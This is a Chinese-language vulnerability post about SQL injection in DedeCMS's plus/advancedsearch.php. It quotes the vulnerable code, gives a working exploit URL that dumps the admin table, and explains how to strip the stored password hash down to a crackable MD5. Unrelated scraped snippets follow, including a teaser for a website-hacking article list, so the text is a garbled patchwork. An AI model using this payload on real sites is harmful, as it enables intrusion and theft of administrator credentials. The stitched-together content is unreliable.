漏洞描述:
健壮的模板标签为站长DIY 自己的网站提供了强有力的支持。高效率标签缓存机制:允许对类同的标签进行缓存,在生成 HTML的时候,有利于提高系统反应速度,降低系统消耗的资源。模型与模块概念并存:在模型不能满足用户所有需求的情况下,DedeCMS推出一些互动的模块对系统进行补充,尽量满足用户的需求。
plus/advancedsearch.php
$sql 变量未初始化。导致鸡助漏洞
复制代码代码如下:
if($mid == 0) //必须绕过。
{
showmsg('参数不正确,高级自定义搜索必须指定模型id', 'javascript');
exit();
}
$query = "select maintable, mainfields, addontable, addonfields, template from dede_advancedsearch where mid='$mid'";
$searchinfo = $dsql->GetOne($query);
if(!is_array($searchinfo)) //囧啊,绕过有难度。
{
showmsg('自定义搜索模型不存在','-1'); exit();
}
$template = $searchinfo['template'] != '' ? $searchinfo['template'] : 'advancedsearch.htm';
if(empty($sql)) //人品问题,成功绕过!{
..............
}else{
$sql = urldecode($sql);
$query = $sql;
}
$sql = urlencode($sql);
$dlist = new DataListCP();
$dlist->pageSize = 20;
$dlist->SetParameter("sql", $sql);
$dlist->SetParameter("mid", $mid);
...............
$dlist->SetTemplate($templatefile);
$dlist->SetSource($query);
.............<*参考
*>
测试 *** :
本站提供程序( *** )可能带有攻击性,仅供安全研究与教学之用,风险自负!
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码, *** 是,前减3后减1,得到16位MD5
今天的蚂蚁庄园每日一题的问题有一点难度,2020年5月19日庄园小课堂的问题是小鸡宝宝考考你,小时候拿来染指甲的“指甲花”,其实是?很多玩家都不知道答案是什么,小编我特意整理了相关的资讯,下面小编就为...
搜索引擎优化是一项恒久的事情,所有的指标都是动态的,譬喻:网站排名,你大概会碰着这样的环境,显然网站排名长短常不变的,但颠末一段时间的时间,开始下降,这实际上是一个很是正常的环境。 除了利用大量的时间...
今日,大家为您产生龙膜窗膜基本建设的最后一个实例——比亚迪宋。 最先,避难所和维护的必需一部分 玻璃膜前的维护工作中十分必需。工程施工前,解决整车漆料和车内饰、电器开关、汽车仪表板、门边框...
本文目录一览: 1、如果对某大型商业网站进行攻击,需要哪些基本步骤 2、黑客攻击主要有哪些手段? 3、黑客攻击网站的原理是什么? 4、黑客常用的攻击手段有哪些 5、怎么黑掉一个网站...
(由佛滔居士根据数理文化得出,仅供参考) 梦见心,象征内心有强烈的情感。 通常来说做梦梦到老公,都是出于对老公的爱和关心,或者是希望得到老公更多的爱,更加细致入微的体贴照顾。老公是与自...
外滩万国建筑博览群 | 必玩理由:越夜越美丽的最美江景 黄浦江畔的外滩,百余年来一直被视为上海的象征,从外白渡桥开始绵延1.5公里的江景绝对不容错过。 #万国建筑博览群#曾经的十里洋场坐拥哥特式...